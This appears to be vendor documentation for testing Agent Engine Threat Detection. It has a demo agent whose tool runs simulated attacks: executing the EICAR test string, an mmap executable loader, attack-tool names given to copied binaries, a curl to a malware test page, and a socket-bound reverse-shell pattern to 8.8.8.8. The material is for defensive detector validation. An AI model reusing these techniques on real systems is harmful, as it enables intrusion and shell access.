Test Agent Engine Threat Detection

This page explains how to verify that Agent Engine Threat Detection is working by intentionally triggering detectors and checking for findings. Agent Engine Threat Detection is a built-in service of Security Command Center.

Before you begin

To detect potential threats to your Vertex AI Agent Engine agents, ensure that the Agent Engine Threat Detection service is enabled in Security Command Center.

Set up environment

To test Agent Engine Threat Detection, set up a demo agent that simulates malicious activity.

Create project and activate shell

Select or create a Google Cloud project to use for testing.

To test detectors, you can use the Google Cloud console and Cloud Shell.

  1. Go to the Google Cloud console.

  2. Select the project that you will use to test.

  3. Click Activate Cloud Shell.

You can also run the testing instructions from a local shell.

Set up Vertex AI Agent Engine

If you haven't used Vertex AI Agent Engine in this project before, set up the Vertex AI Agent Engine environment before starting. Record the name of the Cloud Storage staging bucket that you created. We also recommend that you follow the Vertex AI Agent Engine quickstart to learn how to develop and deploy an agent with the Vertex AI SDK.

Create test script

Create the following files, which are used to deploy a new agent for testing. Use a text editor such as nano.

  1. Create a new file named requirements.txt with the following contents.

     google-cloud-aiplatform[agent_engines]
     google-adk
     google-genai
     aiohttp
     cloudpickle
     pydantic
    
  2. Create a new empty file called installation_scripts/install.sh. Some tests require adding content to this file.

  3. Create a new file called main.py with the following contents. Replace the PROJECT_ID, LOCATION, and STAGING_BUCKET variables. The staging bucket name must include the gs:// prefix.

     import asyncio
     import os
     import subprocess
     import socket

     import vertexai
     from vertexai import Client, agent_engines
     from google.adk.agents import llm_agent
     from google.adk.sessions.in_memory_session_service import InMemorySessionService

     # Replace with your own project, location, and staging bucket.
     LOCATION = "LOCATION"
     PROJECT_ID = "PROJECT_ID"
     # Staging bucket must have gs:// prefix
     STAGING_BUCKET = "STAGING_BUCKET"

     client = Client(project=PROJECT_ID, location=LOCATION)


     def _run_command(args, **kwargs):
         output = f"Called {' '.join(args)}\n"
         try:
             res = subprocess.run(args, capture_output=True, text=True, **kwargs)
             if res.stdout:
                 output += f"Result: {res.stdout.strip()}\n"
             if res.stderr:
                 output += f"Error: {res.stderr.strip()}\n"
         except subprocess.TimeoutExpired:
             output += "Command timed out as expected."
         return output


     # Tool to simulate threats. The function body will be replaced for individual
     # detector tests.
     def threat_detection_test():
         output = _run_command(["sleep", "60"])
         output += _run_command(["echo", "this is a fake threat"])
         output += _run_command(["sleep", "10"])
         return output


     root_agent = llm_agent.Agent(
         model="gemini-2.5-flash",
         name="threat_detection_test_agent",
         description="Runs threat detection test.",
         instruction="""
           You are an agent that runs a threat detection test using a fake malicious
           command.
         """,
         tools=[threat_detection_test],
     )


     async def main():
         vertexai.init(
             project=PROJECT_ID,
             location=LOCATION,
             staging_bucket=STAGING_BUCKET,
         )
         app = agent_engines.AdkApp(
             agent=root_agent, session_service_builder=InMemorySessionService
         )
         remote_agent = client.agent_engines.create(
             agent=app,
             config={
                 "display_name": "scc_threat_test_agent",
                 "identity_type": vertexai.types.IdentityType.AGENT_IDENTITY,
                 "requirements": [
                     "google-cloud-aiplatform[agent_engines,adk]",
                     "cloudpickle",
                     "pydantic",
                 ],
                 "staging_bucket": STAGING_BUCKET,
                 "extra_packages": [
                     "installation_scripts/install.sh",
                 ],
             },
         )
         print("Deployed agent: ", remote_agent.api_resource.name)
         try:
             async for event in remote_agent.async_stream_query(
                 user_id="threat_detection_tester",
                 message="Run the threat detection test",
             ):
                 print(event)
         finally:
             client.agent_engines.delete(name=remote_agent.api_resource.name, force=True)


     if __name__ == "__main__":
         asyncio.run(main())
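Because a deployment takes several minutes, it can be worth catching unreplaced placeholders before running the script. The following is a minimal sketch and not part of the original script: check_config is a hypothetical helper, and the sample values in the usage line are illustrative only. It checks just the two constraints stated above: the three placeholders were replaced, and the bucket name starts with gs://.

```python
def check_config(project_id: str, location: str, staging_bucket: str) -> list[str]:
    """Return a list of problems found in the three settings (empty if none)."""
    problems = []
    settings = {
        "PROJECT_ID": project_id,
        "LOCATION": location,
        "STAGING_BUCKET": staging_bucket,
    }
    for name, value in settings.items():
        # A value that is empty or equal to its own variable name was never replaced.
        if not value.strip() or value.strip() == name:
            problems.append(f"{name} still holds its placeholder value")
    if not staging_bucket.startswith("gs://"):
        problems.append("STAGING_BUCKET must start with gs://")
    return problems


if __name__ == "__main__":
    # Illustrative values; the bucket here is missing its gs:// prefix.
    print(check_config("my-project", "us-central1", "my-bucket"))
```

Calling check_config(PROJECT_ID, LOCATION, STAGING_BUCKET) at the top of main() and stopping when the list is non-empty is one way to use it.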
     
    

Set up virtual environment

  1. Create and activate a Python virtual environment.

       
     python3 -m venv env
     source env/bin/activate
    
  2. Install necessary dependencies in the virtual environment.

     pip install -r requirements.txt
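To confirm that the installation succeeded before starting a long deployment, you could check that the modules can be found from inside the virtual environment. This is a rough sketch: missing_modules is a hypothetical helper, and the import names in REQUIRED are assumptions about which modules the packages in requirements.txt provide (vertexai and google.adk are the ones that main.py imports).

```python
import importlib.util


def missing_modules(module_names):
    """Return the names from module_names that cannot be located for import."""
    missing = []
    for name in module_names:
        try:
            found = importlib.util.find_spec(name) is not None
        except (ImportError, ValueError):
            # Raised when a parent package of a dotted name is not installed.
            found = False
        if not found:
            missing.append(name)
    return missing


# Assumed import names for the packages listed in requirements.txt.
REQUIRED = ["vertexai", "google.adk", "google.genai", "aiohttp", "cloudpickle", "pydantic"]

if __name__ == "__main__":
    print("Missing modules:", missing_modules(REQUIRED))
```

An empty list suggests the environment is ready; any listed name points at a package to reinstall.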
    

Test the script

Run the script from inside the virtual environment with python3 main.py. The command takes several minutes to build, deploy, and execute the test agent.

The script outputs the resource name of the deployed agent, and a few JSON objects including an LLM response and other metadata. If you encounter permission errors or deployment errors at this stage, consult troubleshooting for next steps.
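After a test run, you check Security Command Center for the resulting finding. As a hedged sketch of one way to do that from a shell, the helpers below assemble a findings filter and a gcloud scc findings list command line. Both function names are hypothetical, the category value is a placeholder that you would replace with the category shown for the detector in Security Command Center, and the exact command shape is an assumption to verify against the gcloud reference for your environment.

```python
def build_findings_filter(category: str, state: str = "ACTIVE") -> str:
    """Build a filter expression that matches one finding category in one state."""
    return f'category="{category}" AND state="{state}"'


def build_list_command(project_id: str, category: str) -> list[str]:
    """Return an argument list for listing matching findings in a project."""
    return [
        "gcloud",
        "scc",
        "findings",
        "list",
        f"projects/{project_id}",
        f"--filter={build_findings_filter(category)}",
    ]


if __name__ == "__main__":
    # EXAMPLE_CATEGORY and my-project are placeholders, not real values.
    print(" ".join(build_list_command("my-project", "EXAMPLE_CATEGORY")))
```

The argument list can be passed to subprocess.run in a shell where gcloud is installed and authenticated, or the same filter can be pasted into the findings query in the console.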

Test detectors

To test Agent Engine Threat Detection detectors, replace the code in the threat_detection_test function with code that simulates an attack. The script can take a long time to deploy and query the agent. To speed up testing, you can combine the contents of several of these functions together.

Execution: Added Malicious Binary Executed

Replace the threat_detection_test function in the test script, and then run the test script.

    def threat_detection_test():
        output = _run_command(["sleep", "60"])
        eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
        output += _run_command(["touch", "/tmp/test_mal_file"])
        with open("/tmp/test_mal_file", "w") as f:
            f.write(eicar)
        output += _run_command(["chmod", "700", "/tmp/test_mal_file"])
        output += _run_command(["sh", "-c", "/tmp/test_mal_file"])
        output += _run_command(["sleep", "10"])
        return output
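The eicar value is the standard 68-character EICAR antivirus test string, which is harmless. It contains one backslash, so the r prefix matters when you copy it: without the prefix, recent Python versions warn about the unrecognized \P escape. The sketch below is a quick sanity check that a copied string survived intact; looks_like_eicar is a hypothetical helper, not part of the test script.

```python
EICAR = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"


def looks_like_eicar(text: str) -> bool:
    """Check length, the single backslash, and the fixed start and end of the string."""
    return (
        len(text) == 68
        and text.count("\\") == 1
        and text.startswith("X5O!P%@AP[4")
        and text.endswith("-TEST-FILE!$H+H*")
    )


if __name__ == "__main__":
    print(looks_like_eicar(EICAR))
```

A False result usually means that a character was dropped or altered while copying.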
 

Execution: Added Malicious Library Loaded

Replace the threat_detection_test function in the test script, and then run the test script. You might receive an error from the Vertex AI SDK about parsing the response, but the finding is still generated.

    def threat_detection_test():
        output = _run_command(["sleep", "60"])
        eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
        with open("/tmp/test_mal_lib", "w") as f:
            f.write(eicar)
        with open("/tmp/loader.c", "w") as f:
            f.write("""
    #include <fcntl.h>
    #include <sys/mman.h>
    #include <sys/stat.h>
    #include <unistd.h>
    #include <stdlib.h>
    int main(int argc, char *argv[]) {
        int fd = open(argv[1], O_RDONLY);
        struct stat sb;
        fstat(fd, &sb);
        void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
        write(1, addr, sb.st_size);
        munmap(addr, sb.st_size);
        close(fd);
        return 0;
    }
    """)
        output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
        output += _run_command(["/tmp/loader", "/tmp/test_mal_lib"])
        output += _run_command(["sleep", "10"])
        return output
 

Execution: Container Escape

Replace the threat_detection_test function in the test script, and then run the test script.

    def threat_detection_test():
        output = _run_command(["sleep", "60"])
        output += _run_command(["cp", "/bin/ls", "/tmp/botb-linux-amd64"])
        output += _run_command(["chmod", "700", "/tmp/botb-linux-amd64"])
        output += _run_command(["/tmp/botb-linux-amd64", "-autopwn"])
        output += _run_command(["sleep", "10"])
        return output
 

Execution: Kubernetes Attack Tool Execution

Replace the threat_detection_test function in the test script, and then run the test script.

    def threat_detection_test():
        output = _run_command(["sleep", "60"])
        output += _run_command(["cp", "/bin/ls", "/tmp/amicontained"])
        output += _run_command(["/tmp/amicontained"])
        output += _run_command(["sleep", "10"])
        return output
 

Execution: Local Reconnaissance Tool Execution

Replace the threat_detection_test function in the test script, and then run the test script.

    def threat_detection_test():
        output = _run_command(["sleep", "60"])
        output += _run_command(["cp", "/bin/ls", "/tmp/linenum.sh"])
        output += _run_command(["/tmp/linenum.sh"])
        output += _run_command(["sleep", "10"])
        return output
 

Execution: Modified Malicious Binary Executed

Replace the threat_detection_test function in the test script, and then run the test script.

    def threat_detection_test():
        eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
        output = _run_command(["sleep", "60"])
        output += _run_command(["chmod", "-R", "777", "/code"])
        with open("/code/entrypoint.sh", "w") as f:
            f.write(eicar)
        output += _run_command(["chmod", "700", "/code/entrypoint.sh"])
        output += _run_command(["sh", "-c", "/code/entrypoint.sh"])
        output += _run_command(["sleep", "10"])
        return output

Execution: Modified Malicious Library Loaded

Replace the threat_detection_test function in the test script, and then run the test script.

    def threat_detection_test():
        eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
        output = _run_command(["sleep", "60"])
        output += _run_command(["chmod", "-R", "777", "/code"])
        with open("/code/entrypoint.sh", "w") as f:
            f.write(eicar)
        with open("/tmp/loader.c", "w") as f:
            f.write("""
    #include <fcntl.h>
    #include <sys/mman.h>
    #include <sys/stat.h>
    #include <unistd.h>
    #include <stdlib.h>
    int main(int argc, char *argv[]) {
        int fd = open(argv[1], O_RDONLY);
        struct stat sb;
        fstat(fd, &sb);
        void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
        write(1, addr, sb.st_size);
        munmap(addr, sb.st_size);
        close(fd);
        return 0;
    }
    """)
        output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
        output += _run_command(["/tmp/loader", "/code/entrypoint.sh"])
        output += _run_command(["sleep", "10"])
        return output
 

Malicious URL Observed

Update the installation_scripts/install.sh file with the following contents.

    #!/bin/bash
    apt-get install -y curl --no-install-recommends

Replace the threat_detection_test function in the test script, and then run the test script.

    def threat_detection_test():
        url = "https://testsafebrowsing.appspot.com/s/malware.html"
        output = _run_command(["sleep", "60"])
        output += _run_command(["curl", url])
        output += _run_command(["sleep", "10"])
        return output
 

Reverse Shell

Replace the threat_detection_test function in the test script, and then run the test script.

    def threat_detection_test():
        output = _run_command(["sleep", "60"])
        output += _run_command(["cp", "/bin/echo", "/tmp/sh"])
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(("8.8.8.8", 53))
        subprocess.run(["/tmp/sh"], stdin=s, stdout=s, stderr=s, timeout=5)
        output += _run_command(["sleep", "10"])
        return output
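The test works by handing a connected socket to a child process as its standard streams, which is the pattern that a reverse shell uses. To see that mechanism locally without any network connection, the following sketch binds a child's stdout to one end of a local socket pair and reads the output from the other end. It is an illustration only: run_with_socket_stdout is a hypothetical helper, it is not expected to produce a finding, and it assumes the child writes only a small amount of output.

```python
import socket
import subprocess


def run_with_socket_stdout(args):
    """Run args with stdout bound to a local socket and return the bytes received."""
    parent_end, child_end = socket.socketpair()
    try:
        # subprocess accepts any object with fileno(), including a socket.
        subprocess.run(args, stdout=child_end, timeout=5, check=True)
        # Close our copy of the child's end so that recv() can see end-of-stream.
        child_end.close()
        chunks = []
        while True:
            data = parent_end.recv(4096)
            if not data:
                break
            chunks.append(data)
        return b"".join(chunks)
    finally:
        parent_end.close()
        child_end.close()


if __name__ == "__main__":
    print(run_with_socket_stdout(["echo", "hello"]))
```

In the test above, the socket is a TCP connection to 8.8.8.8 on port 53 instead of a local pair, and the child is a copy of /bin/echo named /tmp/sh.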
 

What's next
